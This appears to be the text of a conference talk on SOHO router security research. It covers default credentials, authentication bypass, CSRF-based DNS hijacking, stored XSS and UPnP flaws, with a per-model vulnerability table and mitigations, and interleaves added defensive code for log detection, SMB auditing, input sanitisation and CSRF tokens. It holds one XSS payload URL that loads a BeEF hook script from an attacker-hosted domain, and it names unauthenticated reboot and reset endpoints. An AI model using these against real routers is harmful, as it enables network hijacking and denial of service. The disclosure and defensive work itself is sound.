About us...
Destroying Router Security · NNC5ed2
Meet our research group
• Álvaro Folgado Rueda, Independent Researcher
• José Antonio Rodríguez García, Independent Researcher
• Iván Sanz de Castro, Security Analyst at Wise Security Global
Main goals
• Search for vulnerability issues
• Explore innovative attack vectors
• Develop exploiting tools
• Build an audit methodology
• Evaluate the current security level of routers
State of the art
• Previous research
State of the art
• Real world attacks - Example 1
• Real world attacks - Example 2
Common security problems
• Services
  • Too many. Mostly useless.
  • Increase the attack surface
  • Insecure
Common security problems
• Default credentials
  • Public and well-known for each model
  • Not randomly generated
Chart: default User / Password pairs found on the audited routers: 1234 / 1234, admin / admin, [blank] / admin, admin / password, vodafone / vodafone (shares shown on the pie: 45%, 27%, 5%, 5%, 18%)
Common security problems
• Default credentials
  • Hardly ever modified by users
Users' response when asked about router passwords, from best-case to worst-case scenario:
“I don't remember what the password is. I have never changed it.”
* Gives you a post-it with the Wi-Fi password *
“Administrative password of... WHAT?”
“Oh!, so we have one of those (routers)?”
Common security problems
• Multiple user accounts
  • Also with public default credentials
  • Mostly useless for users
  • Almost always hidden from end-users
  • Passwords for these accounts are never changed
Bypass Authentication
• Allows unauthenticated attackers to carry out router configuration changes
  • Locally and remotely
• Exploits:
  • Improper file permissions
  • Service misconfiguration
Bypass Authentication
• Web configuration interface
  • Permanent Denial of Service
    • By accessing /rebootinfo.cgi
  • Reset to default configuration settings
    • By accessing /restoreinfo.cgi
  • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized)
    • But spamming gets the job done!
Video Demo #1
• Persistent DoS / Restore router to default settings without requiring authentication
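The "spamming" pattern above has a clear detection signature: a run of rejected (400/401) requests from one client to the reboot or restore endpoint. The following is an added example, not a tool from the talk; it assumes the router's HTTP server keeps Apache/nginx "combined"-style access logs, uses the two endpoint names from the slide, and runs over constructed log lines.

```python
"""Flag bursts of rejected requests to reboot/restore CGI endpoints.

Added example (not from the talk). Assumes combined-format access logs;
the endpoint names come from the slide, the log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoints named on the slide; extend per router model (assumption).
SENSITIVE_PATHS = {"/rebootinfo.cgi", "/restoreinfo.cgi"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path").split("?", 1)[0],  # drop any query string
        "status": int(m.group("status")),
    }


def find_bursts(lines, window=timedelta(seconds=60), threshold=5):
    """Return {(client_ip, path): total_rejected_hits} for clients that were
    rejected (HTTP 400/401) on a sensitive endpoint at least `threshold` times
    inside any `window`. A legitimate admin reboots once while authenticated
    (200), so a run of rejected hits on these paths is the thing to alert on."""
    rejected = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] in SENSITIVE_PATHS and rec["status"] in (400, 401):
            rejected[(rec["ip"], rec["path"])].append(rec["ts"])

    alerts = {}
    for key, stamps in rejected.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):      # sliding window over timestamps
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = len(stamps)
                break
    return alerts


# Constructed sample log: one noisy client, one normal client, one admin reboot.
SAMPLE_LOG = [
    '192.168.1.50 - - [12/Oct/2015:10:00:01 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 -',
    '192.168.1.50 - - [12/Oct/2015:10:00:03 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 -',
    '192.168.1.20 - - [12/Oct/2015:10:00:04 +0200] "GET /index.html HTTP/1.1" 200 1320',
    '192.168.1.50 - - [12/Oct/2015:10:00:06 +0200] "GET /rebootinfo.cgi HTTP/1.1" 400 -',
    '192.168.1.50 - - [12/Oct/2015:10:00:09 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 -',
    '192.168.1.50 - - [12/Oct/2015:10:00:12 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 -',
    '192.168.1.50 - - [12/Oct/2015:10:00:15 +0200] "GET /rebootinfo.cgi?x=1 HTTP/1.1" 401 -',
    '192.168.1.10 - admin [12/Oct/2015:11:30:00 +0200] "GET /rebootinfo.cgi HTTP/1.1" 200 210',
]

if __name__ == "__main__":
    for (ip, path), n in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip} -> {path}: {n} rejected requests")
```

The threshold deliberately counts only rejected responses: the single authenticated reboot from the admin host never contributes, so the rule stays quiet during normal administration.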
Bypass Authentication
• SMB
  • Allows unauthenticated attackers to download the entire router filesystem
    • Including critical files such as /etc/passwd
  • File modification is possible as well
  • Erroneous configuration of the wide links feature
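The SMB problem on the slide is a configuration one: a guest-accessible share combined with Samba's "wide links" option, which lets a symlink inside the share resolve to any path on the router. The audit below is an added example (not the talk's tool) that reads smb.conf syntax with Python's configparser; parameter names are Samba's documented ones and the defaults used are the ones from the smb.conf man page. Both sample configurations are constructed.

```python
"""Audit an smb.conf for guest shares that expose the filesystem via wide links.

Added example (not from the talk). Minimal INI reading via configparser;
parameter names and defaults follow the smb.conf man page. Samples constructed.
"""
import configparser


def load_smb_conf(text):
    # interpolation=None: Samba values contain %U, %m, ... which are not Python
    # interpolation; strict=False: tolerate duplicated keys as Samba does.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def as_bool(value):
    return str(value).strip().lower() in ("yes", "true", "1")


def param(cp, share, key, default):
    """Per-share value, then [global], then Samba's documented default."""
    for section in (share, "global"):
        if cp.has_option(section, key):
            return cp.get(section, key)
    return default


def is_writable(cp, share):
    # "writable"/"writeable" are inverted synonyms of "read only" (default yes).
    for key in ("writable", "writeable"):
        if cp.has_option(share, key) or cp.has_option("global", key):
            return as_bool(param(cp, share, key, "no"))
    return not as_bool(param(cp, share, "read only", "yes"))


def audit_smb_conf(text):
    """Return one finding per share whose symlinks can escape the share path."""
    cp = load_smb_conf(text)
    # Samba only honours "wide links = yes" while "unix extensions" (global) is off.
    unix_ext = as_bool(param(cp, "global", "unix extensions", "yes"))
    findings = []
    for share in cp.sections():
        if share == "global":
            continue
        wide_links = as_bool(param(cp, share, "wide links", "no")) and not unix_ext
        follow = as_bool(param(cp, share, "follow symlinks", "yes"))
        if not (wide_links and follow):
            continue
        guest = as_bool(param(cp, share, "guest ok", "no"))
        findings.append({
            "share": share,
            "anonymous": guest,
            "writable": is_writable(cp, share),
            "risk": "symlinks inside the share resolve outside its path"
                    + (" for unauthenticated clients" if guest else ""),
        })
    return findings


# Constructed: the weak setting the slide describes ...
WEAK_SMB_CONF = """
[global]
    workgroup = WORKGROUP
    unix extensions = no
    wide links = yes
    map to guest = Bad User

[usb]
    path = /mnt/usb
    guest ok = yes
    writable = yes
"""

# ... and the corrected one: symlinks stay inside the share, no guest access.
HARDENED_SMB_CONF = """
[global]
    workgroup = WORKGROUP
    unix extensions = yes
    wide links = no

[usb]
    path = /mnt/usb
    guest ok = no
    read only = yes
"""

if __name__ == "__main__":
    for f in audit_smb_conf(WEAK_SMB_CONF):
        print(f)
    print("hardened findings:", audit_smb_conf(HARDENED_SMB_CONF))
```

A writable finding is the worse case: a client can create the symlink itself rather than needing one to exist already, which is what turns a read-only leak into the file-modification case on the slide.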
Bypass Authentication
• Twonky Media Server
  • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router
    • Download / Modify / Delete / Upload files
  • Misconfiguration of the service
Cross Site Request Forgery
• Change any router configuration setting by sending a specific malicious link to the victim
• Main goal
  • DNS Hijacking
• Requires embedding login credentials in the malicious URL
  • Attack feasible if credentials have never been changed
  • Google Chrome does not pop up a warning message
Cross Site Request Forgery
• Suspicious link, isn't it?
  • URL Shortening Services
  • Create a malicious website
Persistent Cross Site Scripting
• Inject malicious script code within the web configuration interface
• Goals
  • Session Hijacking
  • Browser Infection
Persistent Cross Site Scripting
• Browser Exploitation Framework (BeEF) is a great help
• Input field character length limitation
  • BeEF hooks link to a more complex script file hosted by the attacker
http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>
Unauthenticated Cross Site Scripting
• Script code injection is performed locally without requiring any login process
• Send a DHCP Request PDU containing the malicious script within the hostname parameter
• The malicious script is injected within the Connected Clients (DHCP Leases) table
• Sometimes it is a little bit harder...
• Or even next level...
  • But it works!
Privilege Escalation
• User without administrator rights is able to escalate privileges and become an administrator
• Shows why multiple user accounts are unsafe
Video Demo #2
• Privilege Escalation via FTP
Backdoor
• Hidden administrator accounts
  • Completely invisible to end users
  • But allow attackers to change any configuration setting
Information Disclosure
• Obtain critical information without requiring any login process
  • WLAN password
  • Detailed list of currently connected clients
  • Hints about the router's administrative password
  • Other critical configuration settings
Universal Plug and Play
• Enabled by default on several router models
• Allows applications to execute network configuration changes such as opening ports
• Extremely insecure protocol
  • Lack of an authentication process
  • Awful implementations
• Goals
  • Open critical ports for remote WAN hosts
  • Persistent Denial of Service
  • Carry out other configuration changes
• Locally
  • Miranda UPnP tool
• Remotely
  • Malicious SWF file
Attack vectors
• Locally
  • Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly
• Remotely
  • The attacker is outside of the victim's LAN
Social Engineering is your friend
• For link-based remote attacks
  • XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Live Demo #1
• DNS Hijacking via CSRF
Live Demo #2
• Bypass Authentication using SMB Symlinks
• Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #3
Developed tools
Manufacturers' response
• Average 2-3 emails sent to each manufacturer
• Most of them unreplied... 6 months later
• Number of vulnerabilities fixed: 0
Chart: manufacturers' response, values 7, 3 and 1 for the categories No reply, "Not our problem" and Other
Mitigations
• For end users
  • Change your router's administrative password
  • Try to delete any other administrative account
    • At least, change their passwords
  • Update the firmware...
    • ... after spamming your manufacturer to fix the vulnerabilities
  • Do not trust shortened links
  • Disable UPnP. It's evil
  • Disable any other unused services
Mitigations
• For manufacturers
  • Listen to what security researchers have to say
  • Do not include useless services
    • Especially for ISP SOHO routers
    • At least, make it feasible to completely shut them down
  • Critical ports closed to WAN by default
    • At least: 21, 22, 23, 80 and 8000/8080
  • Randomly generate user credentials
  • Do not include multiple user accounts
  • Avoid using unsafe protocols (HTTP, telnet and FTP)
  • Design a safer alternative to UPnP
Mitigations
• For manufacturers
  • XSS
    • Check every input field within the router's web interface
    • Sanitize DHCP hostname parameters
    • Content Security Policies
  • CSRF
    • Tokens... that work
  • Bypass Authentication & Information Disclosure
    • Check for improper file permissions and public debug messages
  • Service-related
    • Check for possible wrong service configuration (e.g. FTP, SMB)
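The three XSS bullets above (check every input, sanitize DHCP hostnames, Content Security Policy) answer the Unauthenticated Cross Site Scripting section, where a DHCP Request with script in the hostname option lands unescaped in the Connected Clients table. The following is an added example, not code from the talk or from any vendor firmware: it assumes the leases page is rendered server-side from lease records, validates DHCP option 12 against the RFC 1123 hostname syntax, HTML-escapes every cell regardless, and states the CSP header the page should carry. The lease records are constructed.

```python
"""Render the DHCP leases table so that option 12 can never inject markup.

Added example (not from the talk). Assumes server-side rendering from lease
records; the records below are constructed.
"""
import html
import re

# RFC 1123 host label: 1-63 alphanumerics or hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
MAX_HOSTNAME_LEN = 253
PLACEHOLDER = "(invalid hostname)"

# Response header for the leases page: scripts may only come from the router
# itself, so even an escaping slip cannot load a hook script from elsewhere.
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def sanitize_hostname(raw):
    """Allow-list validation for DHCP option 12 (bytes as received on the wire).
    Anything that is not a syntactically valid hostname becomes PLACEHOLDER."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return PLACEHOLDER
    text = text.rstrip(".")          # tolerate a trailing dot (FQDN form)
    if not text or len(text) > MAX_HOSTNAME_LEN:
        return PLACEHOLDER
    if all(LABEL_RE.match(label) for label in text.split(".")):
        return text
    return PLACEHOLDER


def render_cell(value):
    """Second layer: HTML-escape every cell, validated or not. Validation may be
    loosened by a later firmware change; output encoding must never be."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


def render_leases_table(leases):
    header = "<tr><th>Hostname</th><th>IP</th><th>MAC</th></tr>"
    rows = []
    for lease in leases:
        cells = (sanitize_hostname(lease["hostname"]), lease["ip"], lease["mac"])
        rows.append("<tr>" + "".join(render_cell(c) for c in cells) + "</tr>")
    return "<table>" + header + "".join(rows) + "</table>"


# Constructed lease records: a normal client and one whose option 12 carries markup.
SAMPLE_LEASES = [
    {"hostname": b"laptop-01", "ip": "192.168.1.20", "mac": "00:11:22:33:44:55"},
    {"hostname": b"<script>alert(1)</script>", "ip": "192.168.1.50", "mac": "66:77:88:99:aa:bb"},
]

if __name__ == "__main__":
    print("Content-Security-Policy:", CSP_HEADER)
    print(render_leases_table(SAMPLE_LEASES))
```

Validation and escaping are kept as separate layers on purpose: the allow-list stops junk from ever being stored, and the escaping guarantees that whatever does get stored (or is later added by another firmware component) is shown as text, not interpreted as HTML.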
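"Tokens... that work" deserves spelling out, because the Cross Site Request Forgery section shows exactly how a weak scheme fails: a GET link carrying the default credentials changes the DNS settings. A token that works is bound to the victim's session, compared in constant time, and demanded on POST requests only. The code below is an added example, not code from the talk or any firmware; it assumes a per-device key generated at first boot and a session id issued at login, and the request objects are constructed dicts standing in for HTTP requests.

```python
"""CSRF gate for a router's configuration handlers.

Added example (not from the talk). Assumes a per-device key and server-side
sessions; the sample requests are constructed dicts, not real HTTP traffic.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: generated once per device at first boot and stored in flash,
# never a constant shared by every unit of a model.
DEVICE_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id, key=DEVICE_KEY):
    """Token bound to the logged-in session. Knowing the URL and the default
    password (the slide's attack) is not enough to compute it."""
    return hmac.new(key, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, token, key=DEVICE_KEY):
    if not isinstance(token, str):
        return False
    # Constant-time comparison; '==' would leak the token byte by byte via timing.
    return hmac.compare_digest(issue_csrf_token(session_id, key), token)


def request_origin(headers):
    """Origin header if present, else the scheme://host[:port] part of Referer."""
    if headers.get("Origin"):
        return headers["Origin"]
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def authorize_config_change(request, session_id, router_origin, key=DEVICE_KEY):
    """Gate for every state-changing handler. `request` is a dict with
    "method", "headers" and "form" (stand-in for the real HTTP request).
    Returns (allowed, reason)."""
    if request["method"] != "POST":
        return False, "state changes only via POST, never via a GET link"
    # Exact comparison: a prefix check would accept http://192.168.1.10 for .1
    if request_origin(request["headers"]) != router_origin:
        return False, "cross-origin or origin-less request"
    token = request["form"].get("csrf_token")
    if token is None:
        return False, "missing CSRF token"
    if not verify_csrf_token(session_id, token, key):
        return False, "CSRF token not bound to this session"
    return True, "ok"


# Constructed sample traffic. 192.0.2.53 is a documentation address.
ROUTER = "http://192.168.1.1"
SESSION = "session-7c2d1e"                       # constructed session id
NEW_DNS = {"dns1": "192.0.2.53"}

# The slide's link-based request: a GET with the settings in the URL.
LINK_REQUEST = {"method": "GET", "headers": {}, "form": dict(NEW_DNS)}
# A forged POST from another site, carrying a token minted for some other session.
FORGED_POST = {"method": "POST",
               "headers": {"Origin": "http://attacker.invalid"},
               "form": dict(NEW_DNS, csrf_token=issue_csrf_token("some-other-session"))}
# The router's own form submission.
LEGIT_POST = {"method": "POST",
              "headers": {"Referer": ROUTER + "/dns.html"},
              "form": dict(NEW_DNS, csrf_token=issue_csrf_token(SESSION))}

if __name__ == "__main__":
    for name, req in (("link", LINK_REQUEST), ("forged", FORGED_POST), ("legit", LEGIT_POST)):
        print(name, authorize_config_change(req, SESSION, ROUTER))
```

The method check alone already defeats the link in the CSRF section; the origin check and the session-bound token are what keep a forged form on an attacker's page from working even when the browser silently attaches the victim's credentials.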
Results
• More than 60 vulnerabilities have been discovered
• 22 router models affected
• 11 manufacturers affected
Chart: disclosed vulnerabilities per manufacturer (series: number of disclosed vulnerabilities, number of affected routers; y-axis 0 to 18)
Chart: vulnerabilities by type (XSS, Unauthenticated XSS, CSRF, Denial of Service, Privilege Escalation, Information Disclosure, Backdoor, Bypass Authentication, UPnP; shares shown on the pie: 21%, 15%, 20%, 8%, 2%, 3%, 2%, 6%, 23%)
Router                   | XSS   | Unauth. XSS | CSRF  | DoS   | Privilege Escalation | Info. Disclosure | Backdoor | Bypass Auth. | UPnP
-------------------------|-------|-------------|-------|-------|----------------------|------------------|----------|--------------|------
Observa Telecom AW4062   | Vuln. | -           | Vuln. | Vuln. | Vuln.                | -                | -        | -            | -
Comtrend WAP-5813n       | Vuln. | -           | Vuln. | -     | -                    | -                | -        | -            | Vuln.
Comtrend CT-5365         | Vuln. | Vuln.       | Vuln. | -     | -                    | -                | -        | -            | Vuln.
D-Link DSL2750B          | -     | -           | -     | -     | -                    | Vuln.            | -        | -            | Vuln.
Belkin F5D7632-4         | -     | -           | Vuln. | Vuln. | -                    | -                | -        | -            | Vuln.
Sagem LiveBox Pro 2 SP   | Vuln. | -           | -     | -     | -                    | -                | -        | -            | Vuln.
Amper Xavi 7968/+        | -     | Vuln.       | -     | -     | -                    | -                | -        | -            | Vuln.
Sagem F@st 1201          | -     | Vuln.       | -     | -     | -                    | -                | -        | -            | -
Linksys WRT54GL          | -     | Vuln.       | -     | -     | -                    | -                | -        | -            | -
Observa Telecom RTA01N   | Vuln. | Vuln.       | Vuln. | Vuln. | -                    | -                | Vuln.    | -            | Vuln.
Observa Telecom BHS-RTA  | -     | -           | -     | -     | -                    | Vuln.            | -        | -            | Vuln.
Observa Telecom VH4032N  | Vuln. | -           | Vuln. | -     | -                    | -                | -        | Vuln.        | Vuln.
Huawei HG553             | Vuln. | -           | Vuln. | Vuln. | -                    | -                | -        | Vuln.        | Vuln.
Huawei HG556a            | Vuln. | Vuln.       | Vuln. | Vuln. | -                    | -                | -        | Vuln.        | Vuln.
Astoria ARV7510          | -     | -           | Vuln. | -     | -                    | -                | -        | Vuln.        | -
Amper ASL-26555          | Vuln. | Vuln.       | Vuln. | -     | -                    | -                | -        | Vuln.        |
Comtrend AR-5387un       | Vuln. | Vuln.       | -     | -     | -                    | -                | -        | -            | -
Netgear CG3100D          | Vuln. | -           | Vuln. | -     | -                    | -                | -        | -            | -
Comtrend VG-8050         | Vuln. | Vuln.       | -     | -     | -                    | -                | -        | -            | -
Zyxel P 660HW-B1A        | Vuln. | -           | Vuln. | -     | -                    | -                | -        | -            | -
Comtrend 536+            | -     | -           | -     | -     | -                    | -                | -        | -            | Vuln.
D-Link DIR-600           | -     | -           | -     | -     | -                    | -                | -        | -            | Vuln.
Responsible Disclosure
Conclusion
• Has SOHO router security improved?
  • Hell NO!
• Serious security problems
  • Easy to exploit
  • With huge impact
  • Millions of users affected
• PLEASE, START FIXING SOHO ROUTER SECURITY
  • NOW!
TL;DR
Álvaro Folgado Rueda · alvfolrue@gmail.com
José A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
Thank you!
Q&A Time
